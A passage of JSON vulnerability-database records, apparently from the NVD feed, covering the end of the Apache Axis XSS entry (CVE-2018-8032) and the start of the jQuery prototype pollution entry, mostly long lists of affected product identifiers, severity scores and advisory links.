"criteria": "cpe:2.3:a:oracle:primavera_unifier:19.12:*:*:*:*:*:*:*",
"matchCriteriaId": "10864586-270E-4ACF-BDCC-ECFCD299305F",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:rapid_planning:12.1:*:*:*:*:*:*:*",
"matchCriteriaId": "19A0F1AF-F2E6-44E7-8E2D-190E103B72D3",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:rapid_planning:12.2:*:*:*:*:*:*:*",
"matchCriteriaId": "6D53690D-3390-4A27-988A-709CD89DD05B",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:real-time_decision_server:3.2.1.0:*:*:*:*:*:*:*",
"matchCriteriaId": "DD2288B1-FF5E-46BC-8551-4CC6B046A0D0",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:retail_order_broker:15.0:*:*:*:*:*:*:*",
"matchCriteriaId": "EE8CF045-09BB-4069-BCEC-496D5AE3B780",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:retail_order_broker:16.0:*:*:*:*:*:*:*",
"matchCriteriaId": "38E74E68-7F19-4EF3-AC00-3C249EAAA39E",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:retail_order_broker:18.0:*:*:*:*:*:*:*",
"matchCriteriaId": "0783F0D1-8FAC-4BCA-A6F5-C5C60E86D56D",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:retail_xstore_point_of_service:7.1:*:*:*:*:*:*:*",
"matchCriteriaId": "A0ED83E3-E6BF-4EAA-AF8F-33485A88A218",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:secure_global_desktop:5.4:*:*:*:*:*:*:*",
"matchCriteriaId": "B5265C91-FF5C-4451-A7C2-D388A65ACFA2",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:secure_global_desktop:5.5:*:*:*:*:*:*:*",
"matchCriteriaId": "C2B933E8-DBC4-4443-B837-BA8BAF8CC249",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:siebel_ui_framework:*:*:*:*:*:*:*:*",
"matchCriteriaId": "EAC9E8DC-5139-4420-9BD6-0B5F2FA3150E",
"versionEndIncluding": "21.0",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:tuxedo:12.1.1.0.0:*:*:*:*:*:*:*",
"matchCriteriaId": "92A6A7BA-CCE6-426F-8434-7A578A245180",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:tuxedo:12.1.3:*:*:*:*:*:*:*",
"matchCriteriaId": "BBC28867-E828-4ABC-BE7B-3E5C2E826879",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:webcenter_portal:12.2.1.3.0:*:*:*:*:*:*:*",
"matchCriteriaId": "D6A4F71A-4269-40FC-8F61-1D1301F2B728",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*",
"matchCriteriaId": "DEECE5FC-CACF-4496-A3E7-164736409252",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "Apache Axis 1.x up to and including 1.4 is vulnerable to a cross-site scripting (XSS) attack in the default servlet/services."
},
{
"lang": "es",
"value": "Apache Axis en versiones 1.x hasta la 1.4 (incluida) es vulnerable a un ataque de Cross-Site Scripting (XSS) en el servlet/services por defecto."
}
],
"id": "CVE-2018-8032",
"lastModified": "2024-11-21T04:13:08.053",
"metrics": {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.0"
},
"exploitabilityScore": 8.6,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": true
}
],
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 2.7,
"source": "nvd@nist.gov",
"type": "Primary"
}
]
},
"published": "2018-08-02T13:29:00.363",
"references": [
{
"source": "security@apache.org",
"url": "http://mail-archives.apache.org/mod_mbox/axis-java-dev/201807.mbox/%3CJIRA.13170716.1531060536000.93536.1531060560060%40Atlassian.JIRA%3E"
},
{
"source": "security@apache.org",
"tags": [
"Issue Tracking",
"Patch",
"Vendor Advisory"
],
"url": "https://issues.apache.org/jira/browse/AXIS-2924"
},
{
"source": "security@apache.org",
"url": "https://lists.apache.org/thread.html/3b89bc9e9d055db7eba8835ff6501f3f5db99d2a0928ec0be9b1d17b%40%3Cjava-dev.axis.apache.org%3E"
},
{
"source": "security@apache.org",
"url": "https://lists.apache.org/thread.html/d06ed5e4eeb77d00e8d594ec01ee8ee1cba173a01ac4b18f1579d041%40%3Cjava-dev.axis.apache.org%3E"
},
{
"source": "security@apache.org",
"tags": [
"Mailing List",
"Third Party Advisory"
],
"url": "https://lists.debian.org/debian-lts-announce/2021/11/msg00015.html"
},
{
"source": "security@apache.org",
"url": "https://security.netapp.com/advisory/ntap-20240621-0006/"
},
{
"source": "security@apache.org",
"tags": [
"Third Party Advisory"
],
"url": "https://www.oracle.com/security-alerts/cpuApr2021.html"
},
{
"source": "security@apache.org",
"tags": [
"Third Party Advisory"
],
"url": "https://www.oracle.com/security-alerts/cpuapr2020.html"
},
{
"source": "security@apache.org",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://www.oracle.com/security-alerts/cpuapr2022.html"
},
{
"source": "security@apache.org",
"tags": [
"Third Party Advisory"
],
"url": "https://www.oracle.com/security-alerts/cpujan2020.html"
},
{
"source": "security@apache.org",
"tags": [
"Third Party Advisory"
],
"url": "https://www.oracle.com/security-alerts/cpujan2021.html"
},
{
"source": "security@apache.org",
"tags": [
"Third Party Advisory"
],
"url": "https://www.oracle.com/security-alerts/cpujul2020.html"
},
{
"source": "security@apache.org",
"url": "https://www.oracle.com/security-alerts/cpujul2022.html"
},
{
"source": "security@apache.org",
"tags": [
"Third Party Advisory"
],
"url": "https://www.oracle.com/security-alerts/cpuoct2021.html"
},
{
"source": "security@apache.org",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://www.oracle.com/technetwork/security-advisory/cpuoct2019-5072832.html"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://mail-archives.apache.org/mod_mbox/axis-java-dev/201807.mbox/%3CJIRA.13170716.1531060536000.93536.1531060560060%40Atlassian.JIRA%3E"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Issue Tracking",
"Patch",
"Vendor Advisory"
],
"url": "https://issues.apache.org/jira/browse/AXIS-2924"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "https://lists.apache.org/thread.html/3b89bc9e9d055db7eba8835ff6501f3f5db99d2a0928ec0be9b1d17b%40%3Cjava-dev.axis.apache.org%3E"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "https://lists.apache.org/thread.html/d06ed5e4eeb77d00e8d594ec01ee8ee1cba173a01ac4b18f1579d041%40%3Cjava-dev.axis.apache.org%3E"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Mailing List",
"Third Party Advisory"
],
"url": "https://lists.debian.org/debian-lts-announce/2021/11/msg00015.html"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "https://security.netapp.com/advisory/ntap-20240621-0006/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://www.oracle.com/security-alerts/cpuApr2021.html"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://www.oracle.com/security-alerts/cpuapr2020.html"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://www.oracle.com/security-alerts/cpuapr2022.html"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://www.oracle.com/security-alerts/cpujan2020.html"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://www.oracle.com/security-alerts/cpujan2021.html"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://www.oracle.com/security-alerts/cpujul2020.html"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "https://www.oracle.com/security-alerts/cpujul2022.html"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://www.oracle.com/security-alerts/cpuoct2021.html"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://www.oracle.com/technetwork/security-advisory/cpuoct2019-5072832.html"
}
],
"sourceIdentifier": "security@apache.org",
"vulnStatus": "Modified",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-79"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}
Vulnerability from fkie_nvd
Published
2019-04-20 00:29
Modified
2024-11-21 04:20
Severity ?
Summary
jQuery before 3.4.0, as used in Drupal, Backdrop CMS, and other products, mishandles jQuery.extend(true, {}, ...) because of Object.prototype pollution. If an unsanitized source object contained an enumerable __proto__ property, it could extend the native Object.prototype.
References
Impacted products
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:jquery:jquery:*:*:*:*:*:*:*:*",
"matchCriteriaId": "D2D193C7-2259-492F-8B85-E74C57A7426A",
"versionEndExcluding": "3.4.0",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:debian:debian_linux:8.0:*:*:*:*:*:*:*",
"matchCriteriaId": "C11E6FB0-C8C0-4527-9AA0-CB9B316F8F43",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*",
"matchCriteriaId": "DEECE5FC-CACF-4496-A3E7-164736409252",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:debian:debian_linux:10.0:*:*:*:*:*:*:*",
"matchCriteriaId": "07B237A9-69A3-4A9C-9DA0-4E06BD37AE73",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:drupal:drupal:*:*:*:*:*:*:*:*",
"matchCriteriaId": "FC5AB839-4DAC-45E7-9D0B-B528F6D12043",
"versionEndExcluding": "7.66",
"versionStartIncluding": "7.0",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:drupal:drupal:*:*:*:*:*:*:*:*",
"matchCriteriaId": "9106BF81-B898-4EB0-B63C-9919D3B22260",
"versionEndExcluding": "8.5.15",
"versionStartIncluding": "8.5.0",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:drupal:drupal:*:*:*:*:*:*:*:*",
"matchCriteriaId": "9B37281E-9B44-42A5-AE0A-17CE6770995C",
"versionEndExcluding": "8.6.15",
"versionStartIncluding": "8.6.0",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:backdropcms:backdrop:*:*:*:*:*:*:*:*",
"matchCriteriaId": "E75C32CE-3FA9-4DC2-A22A-4A841D4911EB",
"versionEndExcluding": "1.11.9",
"versionStartIncluding": "1.11.0",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:backdropcms:backdrop:*:*:*:*:*:*:*:*",
"matchCriteriaId": "F6F204D6-2C8A-4517-8E3C-328ED0D9D3E4",
"versionEndExcluding": "1.12.6",
"versionStartIncluding": "1.12.0",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:fedoraproject:fedora:28:*:*:*:*:*:*:*",
"matchCriteriaId": "DC1BD7B7-6D88-42B8-878E-F1318CA5FCAF",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:fedoraproject:fedora:29:*:*:*:*:*:*:*",
"matchCriteriaId": "D100F7CE-FC64-4CC6-852A-6136D72DA419",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:fedoraproject:fedora:30:*:*:*:*:*:*:*",
"matchCriteriaId": "97A4B8DF-58DA-4AB6-A1F9-331B36409BA3",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:opensuse:backports_sle:15.0:sp1:*:*:*:*:*:*",
"matchCriteriaId": "40513095-7E6E-46B3-B604-C926F1BA3568",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:opensuse:leap:15.1:*:*:*:*:*:*:*",
"matchCriteriaId": "B620311B-34A3-48A6-82DF-6F078D7A4493",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:netapp:oncommand_system_manager:*:*:*:*:*:*:*:*",
"matchCriteriaId": "B9273745-6408-4CD3-94E8-9385D4F5FE69",
"versionEndIncluding": "3.1.3",
"versionStartIncluding": "3.0",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:netapp:snapcenter:-:*:*:*:*:*:*:*",
"matchCriteriaId": "BDFB1169-41A0-4A86-8E4F-FDA9730B1E94",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:redhat:cloudforms:4.7:*:*:*:*:*:*:*",
"matchCriteriaId": "04AC556D-D511-4C4C-B9FB-A089BB2FEFD5",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:redhat:virtualization_manager:4.3:*:*:*:*:*:*:*",
"matchCriteriaId": "9FA1A18F-D997-4121-A01B-FD9B3BF266CF",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:oracle:agile_product_lifecycle_management_for_process:6.1:*:*:*:*:*:*:*",
"matchCriteriaId": "230E2167-9107-4994-8328-295575E17DF6",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:agile_product_lifecycle_management_for_process:6.2.0.0:*:*:*:*:*:*:*",
"matchCriteriaId": "A079FD6E-3BB0-4997-9A8E-6F8FEC89887A",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:agile_product_lifecycle_management_for_process:6.2.1.0:*:*:*:*:*:*:*",
"matchCriteriaId": "900D2344-5160-42A0-8C49-36DBC7FF3D87",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:agile_product_lifecycle_management_for_process:6.2.2.0:*:*:*:*:*:*:*",
"matchCriteriaId": "A4AA4B21-1BA9-4ED8-B9EA-558AF8655D24",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:agile_product_lifecycle_management_for_process:6.2.3.0:*:*:*:*:*:*:*",
"matchCriteriaId": "9C3F9EE5-FCFC-45B8-9F57-C05D42EE0FF0",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:application_express:*:*:*:*:*:*:*:*",
"matchCriteriaId": "90CFEC52-A574-493E-A2AC-0EC21851BBFA",
"versionEndExcluding": "19.1",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:application_service_level_management:13.2.0.0:*:*:*:*:*:*:*",
"matchCriteriaId": "3665B8A2-1F1A-490F-B01D-5B3455A6A539",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:application_service_level_management:13.3.0.0:*:*:*:*:*:*:*",
"matchCriteriaId": "A8577D60-A711-493D-9246-E49D0E2B07E0",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:application_testing_suite:12.5.0.3:*:*:*:*:*:*:*",
"matchCriteriaId": "17EA8B91-7634-4636-B647-1049BA7CA088",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:application_testing_suite:13.1.0.1:*:*:*:*:*:*:*",
"matchCriteriaId": "5B4DF46F-DBCC-41F2-A260-F83A14838F23",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:application_testing_suite:13.2:*:*:*:*:*:*:*",
"matchCriteriaId": "5E5BC0B6-0C66-4FC5-81F0-6AC9BEC0813E",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:application_testing_suite:13.2.0.1:*:*:*:*:*:*:*",
"matchCriteriaId": "10F17843-32EA-4C31-B65C-F424447BEF7B",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:application_testing_suite:13.3:*:*:*:*:*:*:*",
"matchCriteriaId": "C784CEE8-F071-4583-A72D-F46C7C95FEC0",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:application_testing_suite:13.3.0.1:*:*:*:*:*:*:*",
"matchCriteriaId": "A125E817-F974-4509-872C-B71933F42AD1",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:banking_digital_experience:18.1:*:*:*:*:*:*:*",
"matchCriteriaId": "BBE7BF09-B89C-4590-821E-6C0587E096B5",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:banking_digital_experience:18.2:*:*:*:*:*:*:*",
"matchCriteriaId": "ADAE8A71-0BCD-42D5-B38C-9B2A27CC1E6B",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:banking_digital_experience:18.3:*:*:*:*:*:*:*",
"matchCriteriaId": "E7231D2D-4092-44F3-B60A-D7C9ED78AFDF",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:banking_digital_experience:19.1:*:*:*:*:*:*:*",
"matchCriteriaId": "F7BDFC10-45A0-46D8-AB92-4A5E2C1C76ED",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:banking_digital_experience:19.2:*:*:*:*:*:*:*",
"matchCriteriaId": "18127694-109C-4E7E-AE79-0BA351849291",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:banking_digital_experience:20.1:*:*:*:*:*:*:*",
"matchCriteriaId": "33F68878-BC19-4DB8-8A72-BD9FE3D0ACEC",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:banking_enterprise_collections:*:*:*:*:*:*:*:*",
"matchCriteriaId": "660DB443-6250-4956-ABD1-C6A522B8DCCA",
"versionEndIncluding": "2.8.0",
"versionStartIncluding": "2.7.0",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:banking_platform:*:*:*:*:*:*:*:*",
"matchCriteriaId": "3625D477-1338-46CB-90B1-7291D617DC39",
"versionEndIncluding": "2.10.0",
"versionStartIncluding": "2.4.0",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:bi_publisher:5.5.0.0.0:*:*:*:*:*:*:*",
"matchCriteriaId": "5CD806C1-CC17-47BD-8BB0-9430C4253BC7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:bi_publisher:12.2.1.3.0:*:*:*:*:*:*:*",
"matchCriteriaId": "9DC56004-4497-4CDD-AE76-5E3DFAE170F0",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:bi_publisher:12.2.1.4.0:*:*:*:*:*:*:*",
"matchCriteriaId": "274A0CF5-41E8-42E0-9931-F7372A65B9C4",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:big_data_discovery:1.6:*:*:*:*:*:*:*",
"matchCriteriaId": "8C4C38FF-B75B-4DF1-BFB3-C91BDD10D90E",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:business_process_management_suite:12.2.1.3.0:*:*:*:*:*:*:*",
"matchCriteriaId": "E869C417-C0E6-4FC3-B406-45598A1D1906",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:business_process_management_suite:12.2.1.4.0:*:*:*:*:*:*:*",
"matchCriteriaId": "DFEFE2C0-7B98-44F9-B3AD-D6EC607E90DA",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:communications_analytics:12.1.1:*:*:*:*:*:*:*",
"matchCriteriaId": "55D98C27-734F-490B-92D5-251805C841B9",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:communications_application_session_controller:3.8m0:*:*:*:*:*:*:*",
"matchCriteriaId": "B796AC70-A220-48D8-B8CD-97CF57227962",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:communications_billing_and_revenue_management:7.5:*:*:*:*:*:*:*",
"matchCriteriaId": "E6039DC7-08F2-4DD9-B5B5-B6B22DD2409F",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:communications_billing_and_revenue_management:7.5.0.23.0:*:*:*:*:*:*:*",
"matchCriteriaId": "790A89FD-6B86-49AE-9B4F-AE7262915E13",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:communications_billing_and_revenue_management:12.0:*:*:*:*:*:*:*",
"matchCriteriaId": "7231AF76-3D46-41C4-83E9-6E9E12940BD9",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:communications_billing_and_revenue_management:12.0.0.3.0:*:*:*:*:*:*:*",
"matchCriteriaId": "E39D442D-1997-49AF-8B02-5640BE2A26CC",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:communications_diameter_signaling_router:8.0.0:*:*:*:*:*:*:*",
"matchCriteriaId": "A9317C01-22AA-452B-BBBF-5FAFFFB8BEA4",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:communications_diameter_signaling_router:8.1:*:*:*:*:*:*:*",
"matchCriteriaId": "C4534CF9-D9FD-4936-9D8C-077387028A05",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:communications_diameter_signaling_router:8.2:*:*:*:*:*:*:*",
"matchCriteriaId": "D60384BD-284C-4A68-9EEF-0FAFDF0C21F3",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:communications_diameter_signaling_router:8.2.1:*:*:*:*:*:*:*",
"matchCriteriaId": "FCA44E38-EB8C-4E2D-8611-B201F47520E9",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:communications_eagle_application_processor:*:*:*:*:*:*:*:*",
"matchCriteriaId": "1A0E3537-CB5A-40BF-B42C-CED9211B8892",
"versionEndIncluding": "16.4.0",
"versionStartIncluding": "16.1.0",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:communications_element_manager:8.1.1:*:*:*:*:*:*:*",
"matchCriteriaId": "0C57FD3A-0CC1-4BA9-879A-8C4A40234162",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:communications_element_manager:8.2.0:*:*:*:*:*:*:*",
"matchCriteriaId": "698FB6D0-B26F-4760-9B9B-1C65FBFF2126",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:communications_element_manager:8.2.1:*:*:*:*:*:*:*",
"matchCriteriaId": "4F1D64BC-17BF-4DAE-B5FC-BC41F9C12DFD",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:communications_interactive_session_recorder:*:*:*:*:*:*:*:*",
"matchCriteriaId": "4E16A16E-BFA3-4D17-9B4E-B42ADE725356",
"versionEndIncluding": "6.4",
"versionStartIncluding": "6.0",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:communications_operations_monitor:*:*:*:*:*:*:*:*",
"matchCriteriaId": "9264AF8A-3819-40E5-BBCB-3B6C95A0D828",
"versionEndIncluding": "4.3",
"versionStartIncluding": "4.1",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:communications_operations_monitor:3.4:*:*:*:*:*:*:*",
"matchCriteriaId": "D52F557F-D0A0-43D3-85F1-F10B6EBFAEDF",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:communications_operations_monitor:4.0:*:*:*:*:*:*:*",
"matchCriteriaId": "E3517A27-E6EE-497C-9996-F78171BBE90F",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:communications_operations_monitor:4.1.0:*:*:*:*:*:*:*",
"matchCriteriaId": "1C3CE8D5-6404-4CEB-953E-7B7961BC14D6",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:communications_services_gatekeeper:7.0:*:*:*:*:*:*:*",
"matchCriteriaId": "062E4E7C-55BB-46F3-8B61-5A663B565891",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:communications_session_report_manager:8.1.1:*:*:*:*:*:*:*",
"matchCriteriaId": "DB43DFD4-D058-4001-BD19-488E059F4532",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:communications_session_report_manager:8.2.0:*:*:*:*:*:*:*",
"matchCriteriaId": "086E2E5C-44EB-4C07-B298-C04189533996",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:communications_session_report_manager:8.2.1:*:*:*:*:*:*:*",
"matchCriteriaId": "AA77B994-3872-4059-854B-0974AA5593D4",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:communications_session_route_manager:8.1.1:*:*:*:*:*:*:*",
"matchCriteriaId": "5682DAEB-3810-4541-833A-568C868BCE0B",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:communications_session_route_manager:8.2.0:*:*:*:*:*:*:*",
"matchCriteriaId": "01BC9AED-F81D-4344-AD97-EEF19B6EA8C7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:communications_session_route_manager:8.2.1:*:*:*:*:*:*:*",
"matchCriteriaId": "8198E762-9AD9-452B-B1AF-516E52436B7D",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:communications_unified_inventory_management:7.3:*:*:*:*:*:*:*",
"matchCriteriaId": "D0D177F6-25D9-4696-8528-3F57D91BAC12",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:communications_unified_inventory_management:7.4.0:*:*:*:*:*:*:*",
"matchCriteriaId": "539DA24F-E3E0-4455-84C6-A9D96CD601B3",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:communications_webrtc_session_controller:7.2:*:*:*:*:*:*:*",
"matchCriteriaId": "726DB59B-00C7-444E-83F7-CB31032482AB",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:diagnostic_assistant:2.12.36:*:*:*:*:*:*:*",
"matchCriteriaId": "80B6D265-9D72-45C3-AA2C-5B186E23CDAF",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:enterprise_manager_ops_center:12.3.3:*:*:*:*:*:*:*",
"matchCriteriaId": "AB654DFA-FEF9-4D00-ADB0-F3F2B6ACF13E",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:enterprise_manager_ops_center:12.4.0:*:*:*:*:*:*:*",
"matchCriteriaId": "37209C6F-EF99-4D21-9608-B3A06D283D24",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:enterprise_manager_ops_center:12.4.0.0:*:*:*:*:*:*:*",
"matchCriteriaId": "B095CC03-7077-4A58-AB25-CC5380CDCE5A",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:enterprise_session_border_controller:8.4:*:*:*:*:*:*:*",
"matchCriteriaId": "7015A8CB-8FA6-423E-8307-BD903244F517",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:financial_services_analytical_applications_infrastructure:*:*:*:*:*:*:*:*",
"matchCriteriaId": "B5BC32AA-78BE-468B-B92A-5A0FFFA970FA",
"versionEndIncluding": "7.3.5",
"versionStartIncluding": "7.3.3",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:financial_services_analytical_applications_infrastructure:*:*:*:*:*:*:*:*",
"matchCriteriaId": "FA699B16-5100-4485-9BB7-85B247743B17",
"versionEndIncluding": "8.1.0",
"versionStartIncluding": "8.0.2",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:financial_services_analytical_applications_reconciliation_framework:*:*:*:*:*:*:*:*",
"matchCriteriaId": "A7E00BA1-E643-45D9-97D3-EF12C29DB262",
"versionEndIncluding": "8.0.7",
"versionStartIncluding": "8.0.4",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:financial_services_analytical_applications_reconciliation_framework:8.1.0:*:*:*:*:*:*:*",
"matchCriteriaId": "2ACA29E6-F393-46E5-B2B3-9158077819A9",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:financial_services_asset_liability_management:*:*:*:*:*:*:*:*",
"matchCriteriaId": "703DA91D-3440-4C67-AA20-78F71B1376DD",
"versionEndIncluding": "8.0.7",
"versionStartIncluding": "8.0.4",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:financial_services_asset_liability_management:8.1.0:*:*:*:*:*:*:*",
"matchCriteriaId": "39B8DFFF-B037-4F29-8C8E-F4BBC3435199",
"vulnerable": true
},
{
